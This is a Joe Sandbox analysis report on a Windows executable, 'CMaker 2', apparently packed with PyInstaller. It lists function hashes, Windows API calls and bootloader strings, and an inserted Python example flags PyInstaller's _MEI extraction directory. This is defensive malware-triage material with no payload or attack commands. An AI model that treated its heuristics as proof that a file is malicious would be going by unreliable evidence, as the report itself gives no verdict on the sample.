• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
• String ID: Eastern Standard Time$Eastern Summer Time
• API String ID: 3458911817-239921721
• Opcode ID: 42261dce043aad9768269ac913bc210d84eadb49ae327d87659dcf3f3c6d79c5
• Instruction ID: b50354e1d2224f425f0befe569970a78b107d42bc8254237206967faf44b811a
• Opcode Fuzzy Hash: 42261dce043aad9768269ac913bc210d84eadb49ae327d87659dcf3f3c6d79c5
• Instruction Fuzzy Hash: 0B517FB2A1864686E720DF25D8811BA67B8BB48784F44E175EA6DC76D6FF3CE4008B40
APIs
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: 37842ddde8711f02792dbd714da93d21ca306dbea5d47a61d34bf991ce214254
• Instruction ID: 2e768a783a0a7ae22f38a0293df91a469b127e27269dcdeeee21dc2aad621e15
• Opcode Fuzzy Hash: 37842ddde8711f02792dbd714da93d21ca306dbea5d47a61d34bf991ce214254
• Instruction Fuzzy Hash: 5DF0C262B1864287F7A08B60F48936673A0FB84728F404775DA7E826D4EF3CD0498A00
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: CurrentFeaturePresentProcessProcessor
• String ID:
• API String ID: 1010374628-0
• Opcode ID: dbdad111b33b6a5fdb4a43ab8193133b9ed2a6519222c80d6296d74a5515524f
• Instruction ID: 2821749097f311bde980a1aa1fb7a57b0f0633cf781d40bae8a5effa6cfba493
• Opcode Fuzzy Hash: dbdad111b33b6a5fdb4a43ab8193133b9ed2a6519222c80d6296d74a5515524f
• Instruction Fuzzy Hash: 0502E461A1D68341FF55AF25A40027A26A4AF02B90F5BE6B9DD7DC67DAFE3DE4018300

Control-flow Graph

• Executed
• Not Executed
control_flow_graph: basic blocks 7ff6fabe1000-7ff6fabe2c9e of the function whose strings are listed below (interactive graph; the per-block edge list is not reproduced here). The only named call in the graph is SetDllDirectoryW, in block 7ff6fabe2b1e-7ff6fabe2b30; every other call goes to another routine in the same image.
Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: FileModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$hide-early$hide-late$minimize-early$minimize-late$pkg$pyi-contents-directory$pyi-hide-console$pyi-runtime-tmpdir
• API String ID: 514040917-560148345
• Opcode ID: 7a4b8ae4a071d55727e07b7db0f97e579a6f8ca809cbe28dea7bbfeb59589f11
• Instruction ID: 130f31fdbc4349918dbaff94314c5bb4cc284975a580dc01475499f0f6d8ae25
• Opcode Fuzzy Hash: 7a4b8ae4a071d55727e07b7db0f97e579a6f8ca809cbe28dea7bbfeb59589f11
• Instruction Fuzzy Hash: 0C027961A0C68390FF25EB20D8942F923A5AF56784FC451F2DA6EC62D6FF2CE558D310

Control-flow Graph

• Executed
• Not Executed
control_flow_graph: basic blocks 7ff6fabe18d0-7ff6fabe1bc5 of the function whose strings are listed below (interactive graph; the per-block edge list is not reproduced here). No named import is called from the graph; all calls go to other routines in the same image.
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: _fread_nolock
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 840049012-3497178890
• Opcode ID: 31fbc4baec00de1fb27c5009f68031adf4813cd50edda24041016c7100065e53
• Instruction ID: 04fe0394b46b3c1f6f0ce9db7d8b51933c119c72f7c25c432305b1c5e58e16a9
• Opcode Fuzzy Hash: 31fbc4baec00de1fb27c5009f68031adf4813cd50edda24041016c7100065e53
• Instruction Fuzzy Hash: 3E71D271B0868685EB60CB24E0903F963A1FF5A780F9490F5E9AEC77D9FE6DE5448700

Control-flow Graph

• Executed
• Not Executed
control_flow_graph: basic blocks 7ff6fabe15a0-7ff6fabe17bf of the function whose strings are listed below (interactive graph; the per-block edge list is not reproduced here). No named import is called from the graph; all calls go to other routines in the same image.
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                  • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                  • API String ID: 2050909247-1550345328
                                                                                                                                                                                  • Opcode ID: c5ecd4f98c6522e646f86d5e8d3da10d81b6c304669716bf478425d49c864d9e
                                                                                                                                                                                  • Instruction ID: ef82866acc0961129276e843e047cd4436b42a969e2b07fc4e0ad0626a6dd085
                                                                                                                                                                                  • Opcode Fuzzy Hash: c5ecd4f98c6522e646f86d5e8d3da10d81b6c304669716bf478425d49c864d9e
                                                                                                                                                                                  • Instruction Fuzzy Hash: DC518FA1B0864392EB109B15E4801BA23A0FF56B94FD491F1EE2EC77D6FE7CE5548300

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetTempPathW.KERNEL32(?,00000000,FFFFFFFF,00007FF6FABE2AA6), ref: 00007FF6FABE6F14
                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000,FFFFFFFF,00007FF6FABE2AA6), ref: 00007FF6FABE6F1A
                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,FFFFFFFF,00007FF6FABE2AA6), ref: 00007FF6FABE6F5C
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE7040: GetEnvironmentVariableW.KERNEL32(00007FF6FABE29B0), ref: 00007FF6FABE7077
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE7040: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6FABE7099
                                                                                                                                                                                    • Part of subcall function 00007FF6FABF7DEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FABF7E05
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Environment$CreateCurrentDirectoryExpandPathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                  • API String ID: 365913792-1339014028
                                                                                                                                                                                  • Opcode ID: 3ace134f01f87639eb6351f9f1db5e29782779556c5dab28e5d311e0ab063356
                                                                                                                                                                                  • Instruction ID: f19d115e45f4e5482a0ed08d85c25666350580bbace33afe6a2ee5453af97d60
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ace134f01f87639eb6351f9f1db5e29782779556c5dab28e5d311e0ab063356
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D41C465B1964241FB21EB65E8A02B96261AF877C0FC450F5EE2DC77D6FE3CE5418340
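The entry above is the routine that builds the extraction directory: GetTempPathW and GetCurrentProcessId feed the `_MEI%d` format string, CreateDirectoryW creates the result, and the subcall reads and expands the TMP variable. Together with the "LOADER:" strings this is consistent with the PyInstaller bootloader that the report's detection list already flags. The Python below is an added example, not code from the Joe Sandbox report or from PyInstaller: it parses per-function "APIs" and "String ID" lines in the format this report uses (sample input copied from the entry above), applies classification rules that are this example's own assumptions, and adds a path check for `_MEI<digits>` directories for use when hunting for the extraction directory on disk.

```python
"""Added example, not code from the Joe Sandbox report or from PyInstaller:
parse per-function 'APIs' / 'String ID' lines in the format this report
uses and flag the PyInstaller bootloader extraction pattern.  The sample
entry below is copied from this report; the classification rules and the
_MEI directory check are this example's own assumptions."""
import re
from dataclasses import dataclass, field

# One report API line, with or without the "Part of subcall function" prefix
# and with or without an argument list, e.g.
#   GetTempPathW.KERNEL32(?,00000000,FFFFFFFF,00007FF6FABE2AA6), ref: 00007FF6FABE6F14
#   Part of subcall function 00007FF6FABE7040: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6FABE7099
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# PyInstaller names its extraction directory "_MEI" + decimal pid (the
# "_MEI%d" format string referenced by the function above).
MEI_DIR = re.compile(r"(?:^|[\\/])_MEI\d+[\\/]?$")


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)     # (api, module, ref, via_subcall)
    strings: list = field(default_factory=list)  # literals from the "String ID" line


def parse_entry(text: str) -> FunctionEntry:
    """Parse one function block.  Lines carry a leading bullet in the report;
    the "String ID" value is a '$'-separated list of referenced literals."""
    entry = FunctionEntry()
    for raw in text.splitlines():
        line = raw.strip().lstrip("\u2022").strip()
        if line.startswith("String ID:"):
            parts = line[len("String ID:"):].split("$")
            entry.strings.extend(s.strip() for s in parts if s.strip())
            continue
        m = API_LINE.match(line)
        if m:
            entry.apis.append((m["api"], m["module"], m["ref"], m["sub"] is not None))
    return entry


# Assumed rules: (APIs the function must call directly, string prefixes of
# which at least one must be referenced).  Rule names are this example's own.
RULES = {
    "pyinstaller_tempdir": ({"GetTempPathW", "GetCurrentProcessId", "CreateDirectoryW"},
                            ("_MEI%d",)),
    "pyinstaller_extract": (set(), ("Failed to extract %s",)),
    "pyinstaller_child":   (set(), ("Failed to create child process!",)),
}


def classify(entry: FunctionEntry) -> list:
    """Return the names of all rules matching the entry, in RULES order.
    Only direct calls count, so a helper's API calls do not satisfy the
    caller's rule."""
    direct = {api for api, _, _, via_subcall in entry.apis if not via_subcall}
    hits = []
    for name, (need_apis, prefixes) in RULES.items():
        if need_apis <= direct and any(s.startswith(p) for s in entry.strings for p in prefixes):
            hits.append(name)
    return hits


def is_mei_dir(path: str) -> bool:
    """True when the last path component is a PyInstaller _MEI<pid> directory."""
    return MEI_DIR.search(path.rstrip()) is not None


# Constructed sample: the 'APIs' and 'String ID' lines of the entry above.
SAMPLE_TEMPDIR_ENTRY = """\
• GetTempPathW.KERNEL32(?,00000000,FFFFFFFF,00007FF6FABE2AA6), ref: 00007FF6FABE6F14
• GetCurrentProcessId.KERNEL32(?,00000000,FFFFFFFF,00007FF6FABE2AA6), ref: 00007FF6FABE6F1A
• CreateDirectoryW.KERNELBASE(?,00000000,FFFFFFFF,00007FF6FABE2AA6), ref: 00007FF6FABE6F5C
  • Part of subcall function 00007FF6FABE7040: GetEnvironmentVariableW.KERNEL32(00007FF6FABE29B0), ref: 00007FF6FABE7077
  • Part of subcall function 00007FF6FABE7040: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6FABE7099
• String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
"""

if __name__ == "__main__":
    entry = parse_entry(SAMPLE_TEMPDIR_ENTRY)
    for api, module, ref, via_subcall in entry.apis:
        print(f"{'  (subcall) ' if via_subcall else ''}{api}.{module} @ {ref}")
    print("strings:", entry.strings)
    print("rules:", classify(entry))
    print("_MEI dir?", is_mei_dir(r"C:\Users\user\AppData\Local\Temp\_MEI43562"))
```

The rules deliberately match on direct calls only: the TMP handling lives in subfunction 00007FF6FABE7040, and counting its calls toward the caller would let any function that happens to call that helper satisfy the rule. The `_MEI%d` prefix check is the detection-relevant part; the other two rules are keyed to the extraction and child-process error strings that the report lists for sibling functions.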

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                  • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                                                                  • API String ID: 2895956056-699529898
                                                                                                                                                                                  • Opcode ID: 0ec6545137c218525aca36a5c69f06ebb26d0c39709c03294cc33139ca873a5f
                                                                                                                                                                                  • Instruction ID: 39d8d0078324366ea93cfb538059ad89458e2f92bd8e413e15ac5f602ef06f01
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ec6545137c218525aca36a5c69f06ebb26d0c39709c03294cc33139ca873a5f
                                                                                                                                                                                  • Instruction Fuzzy Hash: D7415372A08B8285EB20DB64F4952AA7361FB95364F944379E6BD837D5EF7CD0448B00

                                                                                                                                                                                  Control-flow Graph

Control-flow graph of function 7ff6fabe11d0 (basic blocks 7ff6fabe11d0-7ff6fabe141d; rendered graph edge data not reproduced). Subfunctions called: 7ff6fabea1f0, 7ff6fabe1df0, 7ff6fabf4c30, 7ff6fabe1db0, 7ff6fabe9ed0, 7ff6fabf4c1c, 7ff6fabee794, 7ff6fabee508, 7ff6fabe8630, 7ff6fabeeed4, 7ff6fac09f10.
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                  • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                  • API String ID: 2050909247-2813020118
                                                                                                                                                                                  • Opcode ID: 6607a863c49184fa337af94fa4767ebb549ff6f48f341bbd4ff5e8a9c1792be9
                                                                                                                                                                                  • Instruction ID: e5806725412108f7a44753804c1ca7a812eb49f989eb37a78fb93d9739ef329e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6607a863c49184fa337af94fa4767ebb549ff6f48f341bbd4ff5e8a9c1792be9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 27510562A0868251EB60DB11F4803BA6291BF96794FE841B5ED6EC7BC5FF3CE445C300

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF6FABFEF96,?,?,-00000018,00007FF6FABFA8DB,?,?,?,00007FF6FABFA7D2,?,?,?,00007FF6FABF5D5E), ref: 00007FF6FABFED78
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF6FABFEF96,?,?,-00000018,00007FF6FABFA8DB,?,?,?,00007FF6FABFA7D2,?,?,?,00007FF6FABF5D5E), ref: 00007FF6FABFED84
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                  • API String ID: 3013587201-537541572
                                                                                                                                                                                  • Opcode ID: 273539b1e858eeecb2bd33ed0d4241c55d8440a82afd6c27fbd9155d092c88af
                                                                                                                                                                                  • Instruction ID: 7eae896d20d601a3cea864bc1705136c38d811f6b8af1151bfab60faeff8ed4f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 273539b1e858eeecb2bd33ed0d4241c55d8440a82afd6c27fbd9155d092c88af
                                                                                                                                                                                  • Instruction Fuzzy Hash: E041D469B19A0245FB15CB56A80067523A5BF86BA0F8C9579ED3ED7BD4FF3CE4058300

                                                                                                                                                                                  Control-flow Graph

Control-flow graph of function 7ff6fabfb6d0 (basic blocks 7ff6fabfb6d0-7ff6fabfbb1c; rendered graph edge data not reproduced). API calls within the graph: GetConsoleMode, ReadConsoleW, ReadFile, GetLastError. Subfunctions called: 7ff6fabfb0e8, 7ff6fabfb108, 7ff6fabfa4a4, 7ff6fabfd444, 7ff6fabfa0e4, 7ff6fabfbef8, 7ff6fac0371c, 7ff6fabfb07c, 7ff6fabfb2e8, 7ff6fabfb128.
APIs
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: a28cd08252ad5064423087568c49e9a7316f24dfb60174969f3a4ac2ff351578
• Instruction ID: c3002f006280d611fb7b514197dee55ad8e5b0a7fff8853a383ef1c7cba59764
• Opcode Fuzzy Hash: a28cd08252ad5064423087568c49e9a7316f24dfb60174969f3a4ac2ff351578
• Instruction Fuzzy Hash: 3BC1D52AA0C78789EB509B95D4402BD7B90EF82B80FDD4179DA6D837D1EE7DE845C700

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID:
• API String ID: 995526605-0
• Opcode ID: 6d514f459d47cfe2cf0c15e0a3103aa6adbf6aa1491c99449bd82d5f21bc2020
• Instruction ID: 38e3965ec0dceb2b969462d85f5543efb11a0461e5708e0d7f90792d12168cf7
• Opcode Fuzzy Hash: 6d514f459d47cfe2cf0c15e0a3103aa6adbf6aa1491c99449bd82d5f21bc2020
• Instruction Fuzzy Hash: A0217F71A0C64242EB109B55E49023AA3A0FF967A4F9482B5EABDC3AE4EF7CD4548700

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF6FABE26F4), ref: 00007FF6FABE25D1
  • Part of subcall function 00007FF6FABE1ED0: GetLastError.KERNEL32 ref: 00007FF6FABE1EEC
  • Part of subcall function 00007FF6FABE1ED0: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6FABE25EE,?,00007FF6FABE26F4), ref: 00007FF6FABE1F56
Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: ErrorFileFormatLastMessageModuleName
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
• API String ID: 1234058594-2863816727
• Opcode ID: 3ab6da95184e74374fe48baec535fe5bf269d99fd8fb3e70c2c2714cf1ced2a1
• Instruction ID: 7e53c6e92e006c02139f355eacdbe8c77db174c9963b0569700789ef8149ba67
• Opcode Fuzzy Hash: 3ab6da95184e74374fe48baec535fe5bf269d99fd8fb3e70c2c2714cf1ced2a1
